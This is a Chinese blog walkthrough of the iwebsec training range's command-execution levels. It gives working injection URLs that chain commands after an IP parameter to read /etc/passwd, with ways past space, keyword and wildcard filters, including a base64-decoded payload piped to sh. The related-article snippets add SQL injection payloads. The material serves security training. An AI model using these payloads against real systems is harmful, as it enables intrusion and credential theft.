iwebsec靶场(命令执行)

最新推荐文章于 2025-04-20 19:48:27 发布
最新推荐文章于 2025-04-20 19:48:27 发布
阅读量612 收藏
点赞数 1
分类专栏: iwebsec 文章标签: php 开发语言 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_46029520/article/details/129326418
版权
本文介绍了远程代码执行的概念及其危害,列举了PHP中涉及的函数,如eval()和system()等,同时讲解了Windows和Linux的命令拼接符。文章还提供了iWebSec靶场的实践场景,包括如何执行系统命令、查看系统文件以及绕过空格和关键命令的过滤方法,展示了命令执行漏洞的各种利用方式。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

iwebsec靶场(命令执行)

一、什么是远程代码执行

  • 产生原因:由于程序中预留了执行代码或者命令的接口,并且提供了给用户使用的界面,导致被黑客利用,控制服务器。

  • 漏洞危害:

    1、获取服务器权限
    2、获取敏感数据文件
    3、写入恶意文件getshell
    4、植入木马病毒勒索软件等

二、PHP-RCE涉及函数

1.代码注入
函数作用
eval()把字符串 code 作为PHP代码执行
assert()检查一个断言是否为 false
preg_replace()执行一个正则表达式的搜索和替换
create_function()创建一个匿名函数并且返回函数名创
call_user_func()/call_user_func_array()把第一个参数作为回调函数调用
usort()/uasort()使用用户自定义的比较函数对数组中的值进行排序并保持索引关联
2.命令注入
函数作用
system()执行外部程序,并且显示输出
exec()/shell_exec()通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回
pcntl_exec()在当前进程空间执行指定程序
passthru()执行外部程序并且显示原始输出
popen()打开进程文件指针
proc_open()执行一个命令,并且打开用来输入/输出的文件
指针

三、命令拼接符

1.Windows命令拼接符
符号作用示例
&&左边的命令执行成功,右边的才执行ping 127.0.0.1 && echo “hello”
&简单的拼接ping 1111& echo"hello"
|上一条命令的输出,作为下一条命令参数netstat -ano|findstr 3306
||左边的命令执行失败,右边的才执行ping baidu.com||ping baidu.net
2.Linux命令拼接符
符号作用示例
;没有任何逻辑关系的拼接符ping baidu.com;echo “hello”
&&左边的命令执行成功,右边的才执行cp 1.txt 2.txt && cat 2.txt
|上一条命令的输出,作为下一条命令的参数netstat -an|grep 3306
||左边的命令执行失败,右边的才执行cat 3.txt||cat 2.txt
&任务后台执行,与nohup命令功能差不多java -jar test.jar > log.txt &

四、靶场地址:http://iwebsec.com/

五、命令执行漏洞

1.执行系统命令
/exec/01.php?ip=127.0.0.1;ls

可以将;换成|

请添加图片描述

2.查看系统文件
/exec/01.php?ip=127.0.0.1;cat%20/etc/passwd

请添加图片描述

六、命令执行漏洞空格绕过

1.执行不需要空格的命令
/exec/02.php?ip=127.0.0.1;ifconfig

请添加图片描述

2.使用%09

  • %09是TAB键的url编码

    /exec/02.php?ip=127.0.0.1;cat%09/etc/passwd

    请添加图片描述

3.使用<

  • <表示的是输入重定向的意思,就是把<后面跟的文件取代键盘作为新的输入设备。“命令 < 文件” ,这是将文件作为命令输入。

    /exec/02.php?ip=127.0.0.1;cat</etc/passwd
4.使用{},

  • {}内是整体的命令,逗号就是空格的作用

    /exec/02.php?ip=127.0.0.1;{cat,/etc/passwd}
5.使用$IFS$9

  • 在bash下,可以用$IFS$9代替空格

    /exec/02.php?ip=127.0.0.1;cat$IFS$9/etc/passwd

七、命令执行漏洞关键命令绕过

1.常规绕过

  • 使用常规而且未被过滤的命令

    请添加图片描述

    /exec/03.php?ip=127.0.0.1;less%20/etc/passwd

    请添加图片描述

2.使用符号及拼接

  • 使用不同符号拼接成完整的命令

    /exec/03.php?ip=127.0.0.1;ca%27%27t%20/etc/passwd

八、命令执行漏洞通配符绕过

  • 使用通配符*替代某些字符

    /exec/04.php?ip=127.0.0.1;cat%20/et*/passw*

    请添加图片描述

九、命令执行漏洞base64编码绕过

  • 将命令进行base64编码

    /exec/05.php?ip=127.0.0.1;echo%20Y2F0IC9ldGMvcGFzc3dk|base64%20-d|sh

    请添加图片描述

    请添加图片描述

命令执行漏洞—简单利用1(墨者靶场
weixin_44431280的博客
03-03 1900
命令执行漏洞—简单利用1(墨者靶场命令执行漏洞原理和简介可参考文章:Web安全—远程命令/代码执行(RCE) 命令执行漏洞靶场通关: 步骤一:靶场登陆,输入IP地址查看回显。查看Web界面存在输入IP地址的地方,尝试输入环回地址127.0.0.1查看回显 输入IP地址127.0.0.1查看回显: 步骤二:信息收集判断操作系统,尝试使用系统连接符执行连带命令,例如127.0.0.1;ls。 1,使用Google插件Waapalyzer判断操作系统为Ubuntu(linux),可以使用连接符";"和“管
iwebsec 靶场 —— 命令执行漏洞
技术笔记
11-05 585
命令执行漏洞
iwebsec(代码执行)
果粒程
03-04 964
iwebsec(代码执行)
iwebsec靶场之代码执行关卡-05 create_function函数
最新发布
mooyuan的网络安全博客
04-20 998
该函数的问题在于,若传入的 $args 或者 $function_body_code参数来源于用户输入且未经过严格过滤,攻击者就能够通过构造恶意输入来执行任意 PHP 代码。举例,当代码如下时,加入参数为2和3,那么输出为5。string create_function(string $args,string $function_body_code)根据传递的参数创建匿名函数,并为其返回唯一名称。通过查看源码,分析可知调用了关键代码create_function,具体如下所示。将代码整理后,代码如下。
命令执行靶场实战
qq_23347209的博客
05-31 728
文章目录环境准备一、信息搜集1、nmap扫描2、使用nikto扫描网站目录二、漏洞利用测试三、nc反弹shell 环境准备 靶场下载地址:https://www.vulnhub.com/entry/depth-1,213/ 使用Vmware虚拟机中NAT网络 靶机: 192.168.146.153 攻击机 parrot 192.168.146.129 提示:以下是本篇文章正文内容,下面案例可供参考 一、信息搜集 1、nmap扫描 -A全面扫描 -p-全端口扫描 nmap -A -p- 192.168
iwebsec靶场-命令执行漏洞
dahege666的博客
03-31 1122
命令执行漏洞
iwebsec靶场SQL注入-bool盲注
qq_56041380的博客
03-24 518
bool注入是盲注的一种。它于报错注入不同,布尔注入没有任何报错信息输出,页面返回只有正常和不正常两种状态,攻击者只能通过返回的这两种状态来对其进行判断输入的SQL注入语句是否正确,从而判断数据库中存储了那些信息。
iwebsec靶场搭建
07-28
iwebsec靶场是一个漏洞集成容器,其中集成了大量的web漏洞环境,包括SQL注入、文件包含、命令执行、XXE、反序列化、SSRF、XSS、文件上传等常见的漏洞环境。\[1\] 要搭建iwebsec靶场,可以使用docker来运行容器。...
iwebsec靶场 中间件漏洞通关笔记1-Weblogic中间件漏洞(1)
2401_84968529的博客
05-17 407
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
iwebsec靶场SQL注入-sleep注入
qq_56041380的博客
03-26 421
sleep注入是另一种盲注方式,与bool注入不同,sleep注入没有任何报错信息输出,页面返回不管对错都只是一种状态,攻击者无法通过页面返回状态来判断输入的SQL注入测试语句是否正确,只能通过构造sleep注入的SQL测试语句,根据页面返回的返回时间判断数据库中存储了哪些信息
linux环境下的DVWA靶场命令执行漏洞(中级)通关
ma1145141919810的博客
12-31 968
我自己在通关linux环境下的DVWA靶场命令执行漏洞的过程中遇到了很多问题,于是写了这篇文章分享一下自己的思路。
iwebsec--命令执行漏洞
追求卓越,技术流~
12-04 1098
WINDOWS系统支持的管道符 “|”:直接执行后面的语句 例如:ping www.baidu.com|whoami “||”:如果前面执行的语句执行出错,则执行后面的语句 例如:png www.baidu.com||whoami “&”:如果前面的语句为假则直接执行后面的语句,前面的语句可真可假 例如:png www.baidu.com&whoami或者ping www.baidu.com&whoami “&&”:如果前面的语句为真先执行第一个命令后执行第二个命令;为假则直接出错,也不执行后面的语句 例如
vulrange命令执行靶场绕过
lionwerson的博客
03-31 304
1.开启靶场,提示过滤了cat命令 1.过滤了cat命令可以用其他的命令代替 (1)more (2)head (3)sort 等其他的命令替代 |ls #显示flag文件 |ls flag #显示flag文件 显示出flag852456.txt | more flag/flag852456.txt 读取flag 读取到的flag,其实也可以直接访问这个文件。 2.过滤空格 ${IFS} ${IFS}$1 $IFS+$1 <> %09(php环境下) 通过上面三种
iwebsec靶场 代码执行关卡通关笔记
mooyuan的网络安全博客
11-03 2425
iwebsec靶场代码执行漏洞10个关卡通关笔记。
iwebsec靶场(SSRF)
果粒程
03-06 763
iwebsec靶场(SSRF)
iwebsec靶场(XSS)
果粒程
03-05 853
iwebsec靶场(XSS)
DVWA靶场命令执行(小白笔记)
热门推荐
晚风挽着浮云的博客
10-14 1万+
DVWA靶场命令执行 我们在测试一些web工具时,需要某个web应用作为我们的靶机,这时候就首选应用DVWA(Damn Vulnerable Web Application); DVWA是一款基于php&mysql编写的用于常规web漏洞和检测的web脆弱性测试web应用。其中包含了SQL注入,盲注,文件包含,XSS,CSRF等一些常见的WEB漏洞; 下面是一些命令执行 写的不好,多多包涵 在这里我们进行命令输入 这里我们选择DVWA的难度等级 1:难度LOW...
iwebsec靶场(sql注入)
果粒程
02-24 1412
iwebsec靶场(sql注入)
iwebsec靶场(XXE漏洞)
果粒程
03-07 1158
iwebsec靶场(XXE漏洞)
iwebsec靶场SQL注入漏洞-字符型注入
02-24
### 关于iwebsec靶场中字符型SQL注入漏洞分析 在探讨iwebsec靶场中的字符型SQL注入漏洞时,需理解其核心在于利用特定字符串构造来绕过输入验证机制并执行恶意查询。当应用程序未能正确处理特殊字符或未对用户输入做充分过滤时,攻击者可以通过提交精心设计的数据引发数据库错误或获取敏感信息。 对于字符型注入而言,在构建测试用语句时通常会附加单引号 `'` 来闭合原有查询条件,并通过联合选择 `UNION SELECT` 或其他方法尝试读取额外的信息[^5]。例如: ```sql ?id=1' UNION SELECT 1,2,3--+ ``` 此命令试图关闭原始查询并通过追加新的SELECT子句返回自定义的结果集;然而,如果结尾处缺少必要的注释符号(即双连字符 `--`),这可能导致语法不匹配从而引起服务器端异常响应。 为了进一步探索目标系统的结构以及潜在的安全弱点,可以采用如下策略来进行更深入的渗透测试: - **确认注入点**:先确定是否存在可被利用的位置,比如上述提到的ID参数。 - **探测列数**:使用ORDER BY指令调整输出顺序直至找到最大有效索引值,以此推断出内部表格所含有的字段数目。如下面的例子展示了如何检测第四列为上限的情况: ```php /sqli/02.php?id=-1%df%27%20order%20by%204--+ ``` - **提取元数据**:一旦知道了表内有多少个属性,则可通过GROUP_CONCAT()函数一次性抓取多个记录的内容。这里给出了一种方式用于收集用户名和密码组合: ```sql ?id=-1 UNION SELECT 1,2,GROUP_CONCAT(CONCAT_WS(0x7E,username,password)) FROM iwebsec.user-- ``` 值得注意的是,以上操作均基于假设环境下的实验性质活动,并非真实世界里的合法行为。实际开发过程中应当遵循安全编码实践以防止此类风险的发生,同时定期审查现有防护措施的有效性。 #### 宽字节注入技巧 考虑到某些情况下Web应用可能运行在一个特殊的字符集环境中(如GBK),此时还可以运用所谓的“宽字节注入”。这种技术依赖于多字节字符集中存在的特性——部分字符由两个连续字节组成,其中一个可能是反斜杠 `\` ,它作为转义符会影响后续字符解释的方式[^4]。 具体来说就是发送形似 `%DF'` 的请求片段给服务端解析器,后者会在遇到这样的序列之前插入一个反斜杠变成类似于 `%DF\%'` 这样的形式。而在GBK编码下,这个新产生的三字节串正好对应着某个有效的汉字,因此整个表达式不会触发任何报警而是按照预期逻辑继续向下执行下去。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

果粒程1122

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值